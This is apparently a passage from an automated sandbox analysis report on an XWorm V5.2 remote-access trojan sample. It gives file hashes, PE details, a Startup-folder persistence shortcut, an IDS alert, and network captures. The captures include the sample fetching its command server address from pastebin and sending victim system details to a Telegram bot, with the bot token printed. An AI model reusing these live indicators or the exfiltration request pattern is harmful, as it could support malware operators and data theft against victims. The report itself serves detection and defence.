                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\2QaN4hOyJs.exe
                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 20 17:15:00 2024, mtime=Fri Dec 20 17:15:00 2024, atime=Fri Dec 20 17:15:00 2024, length=171520, window=hide
                                                                                                    Category:modified
                                                                                                    Size (bytes):1022
                                                                                                    Entropy (8bit):4.980279557708383
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:8johq2slmRLgKiJbyPeq4AEwZKPamQJfJjOqygm:8joh1EmReEPeqfEwZKABjLyg
                                                                                                    MD5:BEE9E4BE8BAAAF1515A17C3A727F9F3A
                                                                                                    SHA1:029865D83DEE92B8639440C4CF71BDB4E49BA180
                                                                                                    SHA-256:F39391F7155A6E51B4463B52F21978C5534D7A2EF266ADC5AB3FFE6B24FE6D98
                                                                                                    SHA-512:D6AB14FCC25AA4D06698B7D74A41AE6D088447E317DBC04D9DF37DA1EDE3FC6E1E9451A9EA7B6CD2B70330730181334A1F635CB86F69974E2BF0F8D86FCB0A58
                                                                                                    Malicious:false
                                                                                                    Preview:L..................F.... .....5..S....5..S....5..S............................:..DG..Yr?.D..U..k0.&...&.......bBDj...c#1..S..z.9..S......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y............................=...A.p.p.D.a.t.a...B.P.1......Y....Local.<......EWsG.Y.............................G.L.o.c.a.l.....N.1......Y...Temp..:......EWsG.Y.............................T.e.m.p.....T.2......Y. .System..>......Y.Y......'....................W...S.y.s.t.e.m.......V...............-.......U...........\c.p.....C:\Users\user\AppData\Local\Temp\System..#.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.S.y.s.t.e.m.............:...........|....I.J.H..K..:...`.......X.......302494...........hT..CrF.f4... .{I+>.....,...E...hT..CrF.f4... .{I+>.....,...E..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..mD..pH.H@..=x.....h....H.....K...

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):6.697932609436561
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                    File name:2QaN4hOyJs.exe
                                                                                                    File size:171'520 bytes
                                                                                                    MD5:0999f25f0123e520bb0259a5741f621b
                                                                                                    SHA1:27a3fd47f336dbf4663cbbe1bbde7a3e76179247
                                                                                                    SHA256:712ab1b048b49449d00e124e577e7eabe732252e0ba9ce3cead7eaf46f44903e
                                                                                                    SHA512:03efc0a5549017e46abe03eac0d73b169277491a38d33224de32b916120f65fefdf165a711eab174af30a66c9a7228eee533d7c48d2648e8eade053b39db9188
                                                                                                    SSDEEP:3072:cKH+Fd98QO+mUhijzD9hp3ksZfBKexpN9OA5G54oQ:3Ad9jWntkwfBKexpN9OAo54o
                                                                                                    TLSH:C4F329D2E6DF1278DC5F9E3521120C9B46B79C3E995AA13B06C1BA4F85B36E34973203
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....odg................................. ........@.. ....................................@................................

                                                                                                    File Icon

                                                                                                    Icon Hash:0030383038181800

                                                                                                    Static PE Info

                                                                                                    General

                                                                                                    Entrypoint:0x40c69e
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x67646F8D [Thu Dec 19 19:10:05 2024 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                    Entrypoint Preview

                                                                                                    Instruction
                                                                                                    jmp dword ptr [00402000h]
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al

                                                                                                    Data Directories

                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc6440x57.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xe0000x1f188.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e0000xc.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                    Sections

                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x20000xa6a40xa8001480c585b5a54f001a806407a4a779cbFalse0.4873744419642857data5.6917684477827235IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0xe0000x1f1880x1f20016d7b4cb358bad8e87cfaf706ebf5229False0.4681460215863454data6.572859043089958IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0x2e0000xc0x200c7b91688353e8a3874c53b373b44b3c9False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                    Resources

                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_ICON0xe2200x65b1PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced1.000614604540391
                                                                                                    RT_ICON0x147d40x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.2720779604874009
                                                                                                    RT_ICON0x24ffc0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.4463863958431743
                                                                                                    RT_ICON0x292240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.5135892116182572
                                                                                                    RT_ICON0x2b7cc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.6050656660412758
                                                                                                    RT_ICON0x2c8740x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.7446808510638298
                                                                                                    RT_GROUP_ICON0x2ccdc0x5adata0.7333333333333333
                                                                                                    RT_VERSION0x2cd380x264data0.4526143790849673
                                                                                                    RT_MANIFEST0x2cf9c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                                    Imports

                                                                                                    DLLImport
                                                                                                    mscoree.dll_CorExeMain

                                                                                                    Network Behavior

                                                                                                    Suricata IDS Alerts

                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2024-12-20T19:15:05.861207+01002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.949854149.154.167.220443TCP

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Dec 20, 2024 19:14:03.541018963 CET4971780192.168.2.9208.95.112.1
                                                                                                    Dec 20, 2024 19:14:03.661144018 CET8049717208.95.112.1192.168.2.9
                                                                                                    Dec 20, 2024 19:14:03.661288977 CET4971780192.168.2.9208.95.112.1
                                                                                                    Dec 20, 2024 19:14:03.662343979 CET4971780192.168.2.9208.95.112.1
                                                                                                    Dec 20, 2024 19:14:03.782769918 CET8049717208.95.112.1192.168.2.9
                                                                                                    Dec 20, 2024 19:14:04.814275026 CET8049717208.95.112.1192.168.2.9
                                                                                                    Dec 20, 2024 19:14:04.856462002 CET4971780192.168.2.9208.95.112.1
                                                                                                    Dec 20, 2024 19:15:01.648395061 CET49849443192.168.2.9104.20.3.235
                                                                                                    Dec 20, 2024 19:15:01.648421049 CET44349849104.20.3.235192.168.2.9
                                                                                                    Dec 20, 2024 19:15:01.648494959 CET49849443192.168.2.9104.20.3.235
                                                                                                    Dec 20, 2024 19:15:01.676481962 CET49849443192.168.2.9104.20.3.235
                                                                                                    Dec 20, 2024 19:15:01.676495075 CET44349849104.20.3.235192.168.2.9
                                                                                                    Dec 20, 2024 19:15:02.576987982 CET8049717208.95.112.1192.168.2.9
                                                                                                    Dec 20, 2024 19:15:02.577056885 CET4971780192.168.2.9208.95.112.1
                                                                                                    Dec 20, 2024 19:15:02.912612915 CET44349849104.20.3.235192.168.2.9
                                                                                                    Dec 20, 2024 19:15:02.912689924 CET49849443192.168.2.9104.20.3.235
                                                                                                    Dec 20, 2024 19:15:02.914767027 CET49849443192.168.2.9104.20.3.235
                                                                                                    Dec 20, 2024 19:15:02.914772034 CET44349849104.20.3.235192.168.2.9
                                                                                                    Dec 20, 2024 19:15:02.915165901 CET44349849104.20.3.235192.168.2.9
                                                                                                    Dec 20, 2024 19:15:02.965920925 CET49849443192.168.2.9104.20.3.235
                                                                                                    Dec 20, 2024 19:15:02.968466043 CET49849443192.168.2.9104.20.3.235
                                                                                                    Dec 20, 2024 19:15:03.015343904 CET44349849104.20.3.235192.168.2.9
                                                                                                    Dec 20, 2024 19:15:03.735665083 CET44349849104.20.3.235192.168.2.9
                                                                                                    Dec 20, 2024 19:15:03.735821962 CET44349849104.20.3.235192.168.2.9
                                                                                                    Dec 20, 2024 19:15:03.735909939 CET49849443192.168.2.9104.20.3.235
                                                                                                    Dec 20, 2024 19:15:03.742758036 CET49849443192.168.2.9104.20.3.235
                                                                                                    Dec 20, 2024 19:15:03.806461096 CET4971780192.168.2.9208.95.112.1
                                                                                                    Dec 20, 2024 19:15:03.925971031 CET8049717208.95.112.1192.168.2.9
                                                                                                    Dec 20, 2024 19:15:03.945703030 CET49854443192.168.2.9149.154.167.220
                                                                                                    Dec 20, 2024 19:15:03.945740938 CET44349854149.154.167.220192.168.2.9
                                                                                                    Dec 20, 2024 19:15:03.945904970 CET49854443192.168.2.9149.154.167.220
                                                                                                    Dec 20, 2024 19:15:03.946566105 CET49854443192.168.2.9149.154.167.220
                                                                                                    Dec 20, 2024 19:15:03.946577072 CET44349854149.154.167.220192.168.2.9
                                                                                                    Dec 20, 2024 19:15:05.332426071 CET44349854149.154.167.220192.168.2.9
                                                                                                    Dec 20, 2024 19:15:05.332511902 CET49854443192.168.2.9149.154.167.220
                                                                                                    Dec 20, 2024 19:15:05.344773054 CET49854443192.168.2.9149.154.167.220
                                                                                                    Dec 20, 2024 19:15:05.344784975 CET44349854149.154.167.220192.168.2.9
                                                                                                    Dec 20, 2024 19:15:05.345187902 CET44349854149.154.167.220192.168.2.9
                                                                                                    Dec 20, 2024 19:15:05.354154110 CET49854443192.168.2.9149.154.167.220
                                                                                                    Dec 20, 2024 19:15:05.399324894 CET44349854149.154.167.220192.168.2.9
                                                                                                    Dec 20, 2024 19:15:05.861630917 CET44349854149.154.167.220192.168.2.9
                                                                                                    Dec 20, 2024 19:15:05.862361908 CET44349854149.154.167.220192.168.2.9
                                                                                                    Dec 20, 2024 19:15:05.862483978 CET49854443192.168.2.9149.154.167.220
                                                                                                    Dec 20, 2024 19:15:05.868093014 CET49854443192.168.2.9149.154.167.220

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Dec 20, 2024 19:14:03.397257090 CET5090253192.168.2.91.1.1.1
                                                                                                    Dec 20, 2024 19:14:03.534163952 CET53509021.1.1.1192.168.2.9
                                                                                                    Dec 20, 2024 19:15:01.502505064 CET6539253192.168.2.91.1.1.1
                                                                                                    Dec 20, 2024 19:15:01.647238970 CET53653921.1.1.1192.168.2.9
                                                                                                    Dec 20, 2024 19:15:03.807075024 CET5818253192.168.2.91.1.1.1
                                                                                                    Dec 20, 2024 19:15:03.944658041 CET53581821.1.1.1192.168.2.9
                                                                                                    Dec 20, 2024 19:15:05.988318920 CET6431253192.168.2.91.1.1.1
                                                                                                    Dec 20, 2024 19:15:06.418505907 CET53643121.1.1.1192.168.2.9
                                                                                                    Dec 20, 2024 19:15:10.795805931 CET6030353192.168.2.91.1.1.1
                                                                                                    Dec 20, 2024 19:15:10.933892965 CET53603031.1.1.1192.168.2.9
                                                                                                    Dec 20, 2024 19:15:20.001219034 CET5178153192.168.2.91.1.1.1
                                                                                                    Dec 20, 2024 19:15:20.138489962 CET53517811.1.1.1192.168.2.9
                                                                                                    Dec 20, 2024 19:15:28.108237982 CET6132653192.168.2.91.1.1.1
                                                                                                    Dec 20, 2024 19:15:28.245841026 CET53613261.1.1.1192.168.2.9
                                                                                                    Dec 20, 2024 19:15:36.124474049 CET5415353192.168.2.91.1.1.1
                                                                                                    Dec 20, 2024 19:15:36.263654947 CET53541531.1.1.1192.168.2.9
                                                                                                    Dec 20, 2024 19:15:43.982878923 CET5261553192.168.2.91.1.1.1
                                                                                                    Dec 20, 2024 19:15:44.124100924 CET53526151.1.1.1192.168.2.9
                                                                                                    Dec 20, 2024 19:15:50.686002016 CET5179953192.168.2.91.1.1.1
                                                                                                    Dec 20, 2024 19:15:50.825671911 CET53517991.1.1.1192.168.2.9
                                                                                                    Dec 20, 2024 19:15:55.577055931 CET4946653192.168.2.91.1.1.1
                                                                                                    Dec 20, 2024 19:15:55.715518951 CET53494661.1.1.1192.168.2.9
                                                                                                    Dec 20, 2024 19:16:00.939661026 CET5816153192.168.2.91.1.1.1
                                                                                                    Dec 20, 2024 19:16:01.076795101 CET53581611.1.1.1192.168.2.9
                                                                                                    Dec 20, 2024 19:16:05.857928991 CET5226153192.168.2.91.1.1.1
                                                                                                    Dec 20, 2024 19:16:05.996234894 CET53522611.1.1.1192.168.2.9

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Dec 20, 2024 19:14:03.397257090 CET192.168.2.91.1.1.10xe292Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:01.502505064 CET192.168.2.91.1.1.10xf25bStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:03.807075024 CET192.168.2.91.1.1.10xaff4Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:05.988318920 CET192.168.2.91.1.1.10x515Standard query (0)Brian123121-27796.portmap.ioA (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:10.795805931 CET192.168.2.91.1.1.10x57cStandard query (0)Brian123121-27796.portmap.ioA (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:20.001219034 CET192.168.2.91.1.1.10x8e48Standard query (0)Brian123121-27796.portmap.ioA (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:28.108237982 CET192.168.2.91.1.1.10x453eStandard query (0)Brian123121-27796.portmap.ioA (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:36.124474049 CET192.168.2.91.1.1.10x9670Standard query (0)Brian123121-27796.portmap.ioA (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:43.982878923 CET192.168.2.91.1.1.10x7c30Standard query (0)Brian123121-27796.portmap.ioA (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:50.686002016 CET192.168.2.91.1.1.10xb887Standard query (0)Brian123121-27796.portmap.ioA (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:55.577055931 CET192.168.2.91.1.1.10xfe8bStandard query (0)Brian123121-27796.portmap.ioA (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:16:00.939661026 CET192.168.2.91.1.1.10xe99aStandard query (0)Brian123121-27796.portmap.ioA (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:16:05.857928991 CET192.168.2.91.1.1.10x7d49Standard query (0)Brian123121-27796.portmap.ioA (IP address)IN (0x0001)false

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Dec 20, 2024 19:13:56.894419909 CET1.1.1.1192.168.2.90xe0c0No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:13:56.894419909 CET1.1.1.1192.168.2.90xe0c0No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:14:03.534163952 CET1.1.1.1192.168.2.90xe292No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:01.647238970 CET1.1.1.1192.168.2.90xf25bNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:01.647238970 CET1.1.1.1192.168.2.90xf25bNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:01.647238970 CET1.1.1.1192.168.2.90xf25bNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:03.944658041 CET1.1.1.1192.168.2.90xaff4No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:06.418505907 CET1.1.1.1192.168.2.90x515Name error (3)Brian123121-27796.portmap.iononenoneA (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:10.933892965 CET1.1.1.1192.168.2.90x57cName error (3)Brian123121-27796.portmap.iononenoneA (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:20.138489962 CET1.1.1.1192.168.2.90x8e48Name error (3)Brian123121-27796.portmap.iononenoneA (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:28.245841026 CET1.1.1.1192.168.2.90x453eName error (3)Brian123121-27796.portmap.iononenoneA (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:36.263654947 CET1.1.1.1192.168.2.90x9670Name error (3)Brian123121-27796.portmap.iononenoneA (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:44.124100924 CET1.1.1.1192.168.2.90x7c30Name error (3)Brian123121-27796.portmap.iononenoneA (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:50.825671911 CET1.1.1.1192.168.2.90xb887Name error (3)Brian123121-27796.portmap.iononenoneA (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:15:55.715518951 CET1.1.1.1192.168.2.90xfe8bName error (3)Brian123121-27796.portmap.iononenoneA (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:16:01.076795101 CET1.1.1.1192.168.2.90xe99aName error (3)Brian123121-27796.portmap.iononenoneA (IP address)IN (0x0001)false
                                                                                                    Dec 20, 2024 19:16:05.996234894 CET1.1.1.1192.168.2.90x7d49Name error (3)Brian123121-27796.portmap.iononenoneA (IP address)IN (0x0001)false

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • pastebin.com
                                                                                                    • api.telegram.org
                                                                                                    • ip-api.com

                                                                                                    HTTP Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.949717208.95.112.1807544C:\Users\user\Desktop\2QaN4hOyJs.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 20, 2024 19:14:03.662343979 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                    Host: ip-api.com
                                                                                                    Connection: Keep-Alive
                                                                                                    Dec 20, 2024 19:14:04.814275026 CET175INHTTP/1.1 200 OK
                                                                                                    Date: Fri, 20 Dec 2024 18:14:04 GMT
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    Content-Length: 6
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    X-Ttl: 60
                                                                                                    X-Rl: 44
                                                                                                    Data Raw: 66 61 6c 73 65 0a
                                                                                                    Data Ascii: false


                                                                                                    HTTPS Proxied Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.949849104.20.3.2354437544C:\Users\user\Desktop\2QaN4hOyJs.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-20 18:15:02 UTC74OUTGET /raw/4X62dQQ8 HTTP/1.1
                                                                                                    Host: pastebin.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-20 18:15:03 UTC391INHTTP/1.1 200 OK
                                                                                                    Date: Fri, 20 Dec 2024 18:15:03 GMT
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    x-frame-options: DENY
                                                                                                    x-content-type-options: nosniff
                                                                                                    x-xss-protection: 1;mode=block
                                                                                                    cache-control: public, max-age=1801
                                                                                                    CF-Cache-Status: EXPIRED
                                                                                                    Last-Modified: Fri, 20 Dec 2024 18:15:03 GMT
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f519d94dd3543b5-EWR
                                                                                                    2024-12-20 18:15:03 UTC40INData Raw: 32 32 0d 0a 42 72 69 61 6e 31 32 33 31 32 31 2d 32 37 37 39 36 2e 70 6f 72 74 6d 61 70 2e 69 6f 3a 32 37 37 39 36 0d 0a
                                                                                                    Data Ascii: 22Brian123121-27796.portmap.io:27796
                                                                                                    2024-12-20 18:15:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.949854149.154.167.2204437544C:\Users\user\Desktop\2QaN4hOyJs.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-20 18:15:05 UTC442OUTGET /bot7803481908:AAFRJ7hGTHr7dVyXQ9pw_CE-Cb3xegvn5GY/sendMessage?chat_id=7705511583&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4AB9DA9F1C2993F263A7%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%205BNYU1CK1%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20System HTTP/1.1
                                                                                                    Host: api.telegram.org
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-20 18:15:05 UTC344INHTTP/1.1 403 Forbidden
                                                                                                    Server: nginx/1.18.0
                                                                                                    Date: Fri, 20 Dec 2024 18:15:05 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 84
                                                                                                    Connection: close
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                    2024-12-20 18:15:05 UTC84INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 33 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 46 6f 72 62 69 64 64 65 6e 3a 20 62 6f 74 20 77 61 73 20 62 6c 6f 63 6b 65 64 20 62 79 20 74 68 65 20 75 73 65 72 22 7d
                                                                                                    Data Ascii: {"ok":false,"error_code":403,"description":"Forbidden: bot was blocked by the user"}


                                                                                                    Statistics

                                                                                                    CPU Usage

                                                                                                    Click to jump to process

                                                                                                    Memory Usage

                                                                                                    Click to jump to process

                                                                                                    High Level Behavior Distribution

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Target ID:0
                                                                                                    Start time:13:13:58
                                                                                                    Start date:20/12/2024
